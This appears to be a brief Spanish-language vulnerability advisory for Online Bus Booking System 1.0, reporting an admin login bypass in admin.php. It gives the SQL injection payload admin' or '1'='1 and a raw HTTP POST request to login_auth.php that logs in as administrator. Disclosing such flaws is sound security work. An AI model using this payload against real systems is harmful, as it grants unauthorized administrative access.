
Online Bus Booking System 1.0, hay un bypass de autenticación en la pantalla de inicio de sesión de administrador en admin.php mediante inyección SQL en el nombre de usuario o la contraseña.
Online Bus Booking System 1.0, existe una omisión de autenticación en la pantalla de inicio de sesión de administrador en admin.php mediante inyección SQL en el nombre de usuario o la contraseña.
#Vendor - SourceCodester
#Product -https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html V 1.0
#Vulnerability Type - Omisión de autenticación
#Affected Component - bus_booking/admin.php
#Attack Type- Local
#Privilege Escalation - true
#Impact Code execution - true
Vector de ataque
Vaya al panel de inicio de sesión de administrador e intente omitirlo.
En el payload de la solicitud, establezca
username : admin' or '1'='1
password : admin' or '1'='1
POST /bus_booking/login_auth.php HTTP/1.1
Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0
username=admin'+or+'1'%3D'1&password=admin'+or+'1'%3D'1
Se ha iniciado sesión correctamente en el panel de administración.